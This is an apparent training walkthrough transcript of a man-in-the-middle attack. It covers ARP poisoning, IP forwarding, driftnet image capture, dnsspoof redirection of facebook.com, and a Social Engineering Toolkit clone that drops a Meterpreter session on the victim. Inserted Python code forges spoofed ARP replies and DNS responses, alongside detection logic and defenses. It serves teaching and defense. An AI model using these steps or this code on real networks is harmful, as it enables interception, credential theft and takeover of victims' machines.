Man-in-the-middle attack: Real-life example and video walkthrough by Blackhat 2023
Is your web browsing private, or is a man in the middle looking at everything you do? Learn what a man-in-the-middle (MITM) attack is, how to set one up and carry it out, and why these attacks are so dangerous in this walkthrough from Infosec Skills author Keatron Evans.
Man-in-the-middle attack example
In this episode of Cyber Work Applied, Keatron demonstrates a real-life man-in-the-middle attack example: an innocent victim joins the same Wi-Fi network as a malicious attacker. Once the victim joins, it only takes a few steps for Keatron to fully compromise the machine using MITM attack tools.
Man-in-the-middle attack walkthrough
The edited transcript of the MITM attack walkthrough is provided below, separated into each step Keatron goes through.
How does a man-in-the-middle attack work?
Hi, I'm going to show you how to perform a man-in-the-middle attack. What we see on the screen is one of the victims that we're going to be running a man-in-the-middle attack against. Now, one of the things we need to remember is that any time you visit a website, you do so by going out to a router or a gateway or something to get you to the internet. You primarily find the websites you're trying to visit by doing something called a DNS query, which is when you ask your DNS server for the IP address of wherever you're trying to go.
We're going to be intercepting that process, putting ourselves in the middle, so that when the victim requests Facebook or whatever it is they're trying to get to, we can lie to them and tell them Facebook is wherever we want it to be. Basically, we can point them to a site that we control instead of them getting to the real Facebook.
ARP spoofing man-in-the-middle attack
Let's dive right into it. The first thing we have to do is tell the victim, which is this machine, that we're the gateway, which is .2. That way it will pass all those requests through us. The easy way to do that is something called ARP poisoning. So let me ARP poison.
I'm going to specifically tell the gateway, which is .2, that I'm the victim, which is .100. Now, remember you're in the middle, or you're trying to get in the middle, so you can't just ARP poison one side of that equation. You have to ARP poison both. So simultaneously I'm going to ARP poison and tell the victim that I'm the gateway, which if you're at home or at Starbucks would basically be the Wi-Fi router we're spoofing here.
So with the first ARP spoof, I'm telling the gateway that I'm the victim. With the second ARP spoof, I'm telling the victim that I'm the gateway. This is part of what puts me in the middle. Both sides will now think I'm the other side. So I start my ARP poison and right away you can see the ARP going out, and it's sending a reply, which is telling the .100 machine that I'm the gateway. And it's also telling the gateway that I'm the .100 machine. So that's the ARP poisoning in motion. And it's going every second. The reason it's going every second is because in a real network, every once in a while, the real machines would respond and say, wait a minute, I've got that IP address. So having this ARP reply go out every second guarantees that even if the real device responds, you immediately overwrite that response with your more recent response, because in the land of ARP the most recent reply is considered to be the truth.
Turn on IP forwarding to complete the setup
The last step, once we've got the ARP poison going, is we have to make sure we turn on something called IP forwarding. The reason for that is that by default your machine will simply drop packets that aren't addressed to it. Now, in my case, my machine has IP forwarding turned off, which means it's going to follow that behavior.
What I want to do is change that behavior, because I'm going to be getting packets that are intended for our victim here. Since those packets aren't actually intended for me, my default behavior is to simply drop them. But I don't want to drop them. I want to hold on to them and pass them on. So I'm going to change this IP forward setting from a value of zero to, guess what? If zero is off, what do you think I need to change it to in order to turn it on? Exactly. One.
So I'm simply going to write the number one into this file, and this will actually turn on IP forwarding. To prove this is working, I'm not going to write it yet. I'm going to show you that currently .100, which is this victim, has trouble pinging .2. That's because the ping packet is never making it to the actual gateway. It's coming to my machine, and since my default behavior is to drop packets not meant for me, and I'm clearly not .2, that packet's getting dropped.
But the minute I turn on IP forwarding, let's go ahead and turn that on, now you're going to see those pings end up being 100 percent successful. That's because now the ping is making it to the other side, but it's only making it there by coming through my interface first. So that means I've made myself a proxy, or rather, now I've completed the setup and put myself in the middle.
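As an added illustration of the two ARP replies described in the steps above, and of why the poisoner resends them every second, here is editorial example code (not part of Keatron's walkthrough and not the arpspoof tool's own code). It builds both spoofed frames by hand, parses them back, models a victim's ARP cache in which the most recent reply wins, and ends with the arpwatch-style check a defender would run against the same frames. The subnet 192.168.1.0/24 and all MAC addresses are assumptions; the walkthrough only names the host parts .2, .100 and .204. Nothing is sent on the wire.

```python
import struct

ETH_P_ARP = 0x0806            # EtherType for ARP
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed addresses for the demo. The 192.168.1.0/24 subnet and the MACs
# are assumed; the walkthrough only gives the host parts .2, .100 and .204.
GATEWAY_IP, GATEWAY_MAC = "192.168.1.2", "00:11:22:33:44:02"
VICTIM_IP, VICTIM_MAC = "192.168.1.100", "00:11:22:33:44:64"
ATTACKER_IP, ATTACKER_MAC = "192.168.1.204", "de:ad:be:ef:00:cc"


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet frame carrying an unsolicited ARP reply 'sender_ip is-at sender_mac'.
    Most stacks update their cache on such a reply even without having asked."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet/IPv4, op=reply
    arp += mac_bytes(sender_mac) + ip_bytes(sender_ip)
    arp += mac_bytes(target_mac) + ip_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode the fields of an Ethernet/ARP frame built as above."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    op = struct.unpack("!H", frame[20:22])[0]
    return {"op": op,
            "sender_mac": mac_str(frame[22:28]), "sender_ip": ip_str(frame[28:32]),
            "target_mac": mac_str(frame[32:38]), "target_ip": ip_str(frame[38:42])}


def poison_pair():
    """The two frames sent each round: the victim is told the gateway lives at the
    attacker's MAC, and the gateway is told the victim lives there too."""
    to_victim = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    to_gateway = build_arp_reply(ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP)
    return to_victim, to_gateway


class ArpCache:
    """Minimal model of a host's ARP table: the most recent reply wins."""

    def __init__(self):
        self.table = {}

    def learn(self, frame):
        p = parse_arp(frame)
        if p["op"] == ARP_REPLY:
            self.table[p["sender_ip"]] = p["sender_mac"]

    def lookup(self, ip):
        return self.table.get(ip)


def simulate_victim_cache(rounds=3):
    """Interleave genuine gateway replies with the attacker's once-a-second resend
    and return the MAC the victim ends up using for the gateway."""
    cache = ArpCache()
    genuine = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    for _ in range(rounds):
        cache.learn(genuine)            # the real gateway answers a request
        cache.learn(poison_pair()[0])   # the attacker overwrites it a moment later
    return cache.lookup(GATEWAY_IP)


def detect_mac_flips(frames):
    """arpwatch-style check: report every IP whose advertised MAC changes.
    Returns a list of (ip, old_mac, new_mac)."""
    seen, alerts = {}, []
    for f in frames:
        p = parse_arp(f)
        if p["op"] != ARP_REPLY:
            continue
        old = seen.get(p["sender_ip"])
        if old is not None and old != p["sender_mac"]:
            alerts.append((p["sender_ip"], old, p["sender_mac"]))
        seen[p["sender_ip"]] = p["sender_mac"]
    return alerts


if __name__ == "__main__":
    print("victim now resolves the gateway to", simulate_victim_cache())
    genuine = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    for alert in detect_mac_flips([genuine, *poison_pair()]):
        print("ARP flip:", alert)
```

Putting these frames on the wire needs a raw socket and root (on Linux, socket.AF_PACKET bound to the interface), and the attack only reaches hosts on the same layer-2 segment. The flip that detect_mac_flips reports is exactly what arpwatch alerts on; the preventive controls are static ARP entries on critical hosts or Dynamic ARP Inspection on managed switches, which discards replies that disagree with the DHCP snooping table.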
Stealing victim images using Kali Linux driftnet tool
How do we prove that we're in the middle? What can we do from here? Well, there are a couple of tools I need to show you. The first one is a unique kind of sniffer called Driftnet. The Kali Linux Driftnet tool is special in that it grabs just the images out of a victim's traffic. So if I run Driftnet and tell it to listen on interface six here, you'll see them in this little black window whenever the victim visits websites.
Let's go do that. The victim goes out. It goes to MSN and some different sites. Well, in that traffic are images, and guess what the attacker just captured? All of the images that were in that traffic have now been sniffed off by this attacker in the middle. So any images you would have viewed during your browser session, the attacker is able to see those images now. Not only see them, but if I find one that I want to keep, like this image here with this nice pie, I click it and it actually saves a local copy of that image so I can view it later. Now, if that's not scary enough, let me show you how this really gets serious.
Setting up DNS cache poisoning
On top of the man-in-the-middle and on top of the ARP poisoning, I'm going to do one more thing called DNS cache poisoning. Whenever you go to a website such as Facebook, the first thing that happens is your machine sends a query to your DNS server saying, where is Facebook? What's Facebook's IP? Your DNS server responds and says, here's the IP address for Facebook.
Now, since I'm already in the middle, I'm going to see that request. I'm going to respond on behalf of the actual DNS server and lie to you and tell you that Facebook is at my machine. Let's look at how easy that is. First I'm going to create a file. We'll just call it MITM FB, and I'm going to state in there that Facebook is at my IP, which is .204. I'll save that little text file. Now I'm going to run the tool dnsspoof and point it at the file we just created. What's going on is that any time this tool sees a query for Facebook, it's going to respond to the machine that's asking for Facebook and lie to it and tell it that Facebook is at my IP.
Let's go ping from the victim and see what happens. So the victim says, let's ping facebook.com, and it gets replies. But look at where it says the replies are coming from: .204. So we've successfully poisoned the ARP cache, and we've successfully DNS cache poisoned them. They can't even look up Facebook in DNS without blindly trusting what we're telling them Facebook is.
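To show what dnsspoof is doing at the packet level in the step above, here is an added example (editorial code, not the tool's own and not part of the walkthrough). It parses a hosts file in the style of the one created above, takes a sniffed query, and forges a response that copies the query's transaction ID and question section and answers with the attacker's address. The stub_accepts function is the check a victim's resolver performs before trusting a reply, which is why an on-path lie is accepted without a fight. The hosts-file contents, the wildcard syntax and the address 192.168.1.204 are constructed for the demo.

```python
import fnmatch
import struct

A_RECORD = 1

# Constructed stand-in for the "MITM FB" file: "IP hostname" lines in the style
# of the hosts file dnsspoof reads (assumption: '*' wildcards in the name).
HOSTS_FILE = """
# send anything Facebook-looking to the attacker box (192.168.1.204 assumed)
192.168.1.204  facebook.com
192.168.1.204  *.facebook.com
"""


def load_hosts(text):
    """Parse 'IP pattern' lines, ignoring comments and blanks."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            ip, pattern = line.split()
            rules.append((pattern.lower(), ip))
    return rules


def match_rule(rules, qname):
    """First pattern that matches the queried name wins, like a hosts file."""
    for pattern, ip in rules:
        if fnmatch.fnmatchcase(qname.lower(), pattern):
            return ip
    return None


def encode_name(name):
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in labels) + b"\x00"


def decode_name(msg, off):
    """Wire-format name -> dotted string; follows one compression pointer."""
    labels = []
    while True:
        ln = msg[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0:                                   # pointer to an earlier name
            ptr = struct.unpack("!H", msg[off - 1:off + 1])[0] & 0x3FFF
            labels.append(decode_name(msg, ptr)[0])
            off += 1
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels), off


def build_query(txid, qname, qtype=A_RECORD):
    """What the victim's stub resolver sends: RD set, one question."""
    hdr = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return hdr + encode_name(qname) + struct.pack("!HH", qtype, 1)


def parse_query(msg):
    txid = struct.unpack("!H", msg[:2])[0]
    qname, off = decode_name(msg, 12)
    qtype = struct.unpack("!H", msg[off:off + 2])[0]
    return {"txid": txid, "qname": qname, "qtype": qtype, "question": msg[12:off + 4]}


def forge_response(query, rules, ttl=60):
    """The spoofer's move: reuse the sniffed txid and question, answer with the
    attacker's IP. Returns None for names not in the hosts file, which are left
    to the real resolver."""
    q = parse_query(query)
    ip = match_rule(rules, q["qname"])
    if ip is None or q["qtype"] != A_RECORD:
        return None
    hdr = struct.pack("!HHHHHH", q["txid"], 0x8180, 1, 1, 0, 0)   # QR=1, RD, RA, 1 answer
    rr = b"\xc0\x0c" + struct.pack("!HHIH", A_RECORD, 1, ttl, 4)  # name = pointer to question
    return hdr + q["question"] + rr + bytes(int(x) for x in ip.split("."))


def parse_response(resp):
    """Pull txid, queried name and the first A record out of a response."""
    txid = struct.unpack("!H", resp[:2])[0]
    qname, off = decode_name(resp, 12)
    off += 4                                                      # skip qtype/qclass
    _, off = decode_name(resp, off)
    rtype, _rclass, ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
    rdata = resp[off + 10:off + 10 + rdlen]
    ip = ".".join(str(b) for b in rdata) if rtype == A_RECORD else None
    return {"txid": txid, "qname": qname, "ttl": ttl, "ip": ip}


def stub_accepts(query, resp):
    """What a plain stub resolver checks before trusting a reply: QR bit set, txid
    equal to its own, question echoed back. On-path the attacker has seen the
    txid, so the forgery passes; off-path it would have to guess 16 bits (plus the
    source port) and still arrive before the genuine answer."""
    q = parse_query(query)
    flags = struct.unpack("!H", resp[2:4])[0]
    return ((flags & 0x8000) != 0
            and struct.unpack("!H", resp[:2])[0] == q["txid"]
            and resp[12:12 + len(q["question"])] == q["question"])


if __name__ == "__main__":
    rules = load_hosts(HOSTS_FILE)
    query = build_query(0xBEEF, "facebook.com")
    forged = forge_response(query, rules)
    print(parse_response(forged), stub_accepts(query, forged))
```

A real run of dnsspoof also has to beat the genuine reply, which on a local segment the attacker wins comfortably. What defeats this step is a resolver that validates DNSSEC or carries its queries over TLS or HTTPS to a server outside the attacker's segment, and, for the final stage of the attack, HTTPS with certificate validation: the attacker cannot present a certificate that chains to a trusted root for facebook.com, and browsers that enforce HSTS for that domain will not load it over plain HTTP at all.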
Use Social Engineering Toolkit to clone website
For the last step, I'm going to use the Kali Social Engineering Toolkit on Facebook. I need to make sure I have a nice clean copy of Facebook that looks just like Facebook, but actually has malicious code in it that will give me control of the victim's machine if they browse to it. This is also known as a client-side attack against a browser, and it's what we're going to use to do the actual exploit. It sounds complex, but let me show you how simple it actually is.
I'm going to load up a tool that's been around for a long time, written by Dave Kennedy. Let me show you how to use the Social Engineering Toolkit in Kali Linux. I'm going to pick one for social engineering attacks, two for website attack vectors, and two again for the browser exploit method. Then I'm going to go to the site cloner and say no to NATing. For the IP address I want the victims to come back to, it's going to be mine.
Who do I want to clone? Let's just say Facebook. And then I'm going to use browser autopwn, because these hundreds of exploits here basically depend on me knowing which browser the victim uses. It could be any number of browser and OS combinations, so I'm going to pick autopwn, which means that when the victim hits my fake Facebook server, the server is going to look at that victim's GET request, figure out what the browser and OS are, and then send the appropriate exploit based on that. Alright, I'm going to pick Meterpreter as my payload. In other words, if I'm able to exploit the machine, what do I want to get as my loot? I want a Meterpreter session so that I can take over the machine. Let the port stay 443, and now it's off to the races. It's going out.
It's going to the default Facebook login page. As you can see there, it's cloning it, which means it's copying it down. Now it's putting the malicious code that I've crafted inside that fake Facebook copy. And now it's standing up a version of the exploit for every possible browser and operating system combination and storing each one at a slightly different URL on my server. So when your browser hits this server, it's going to look at your browser version, look at your OS version, and then simply send the appropriate exploit based on that. We're loading them all right here.
Once this is finished, the only thing we have left to do is go play victim and see what happens when the victim simply does what the victim does every day: tries to go to Facebook. So we go to the victim. We open the browser. We load facebook.com in their browser, and at that point right there, it's game over. Let's go back and look. What you see happening on the attacker side is that the attacker now has a session. We connect to that session as the attacker and take our obligatory screenshot here to prove that we have it.
At that point we own that machine. It belongs to us completely. It's no longer the victim's. It's ours. We can drop into a shell, and it's game over at that point. And that, folks, is what a man-in-the-middle attack looks like. Now you can see the actual devastation that can come from it.